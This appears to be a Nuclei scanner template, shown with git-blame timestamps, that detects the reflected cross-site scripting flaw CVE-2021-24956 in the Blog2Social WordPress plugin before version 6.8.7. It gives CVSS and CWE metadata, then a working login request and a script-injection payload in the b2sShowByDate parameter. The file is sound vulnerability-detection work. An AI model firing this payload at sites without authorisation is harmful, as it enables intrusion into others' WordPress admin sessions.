nuclei-templates/http/cves/2021/CVE-2021-24956.yaml

60 lines
1.7 KiB
YAML
Raw Normal View History

2023-08-23 17:42:32 +00:00
id: CVE-2021-24956
info:
name: Blog2Social < 6.8.7 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.
reference:
- https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-24956
2023-08-31 11:46:18 +00:00
remediation: Fixed in version 6.8.7
2023-08-23 17:42:32 +00:00
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-08-23 17:42:32 +00:00
cve-id: CVE-2021-24956
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
epss-score: 0.00106
cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:*
epss-percentile: 0.42451
2023-08-23 17:42:32 +00:00
metadata:
max-request: 2
verified: true
2023-08-31 11:46:18 +00:00
framework: wordpress
vendor: adenion
product: blog2social
2023-08-23 18:12:05 +00:00
tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan
2023-08-23 17:42:32 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=blog2social&b2sShowByDate="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
2023-08-31 11:46:18 +00:00
2023-08-23 17:42:32 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" name='
- 'Your Activity'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200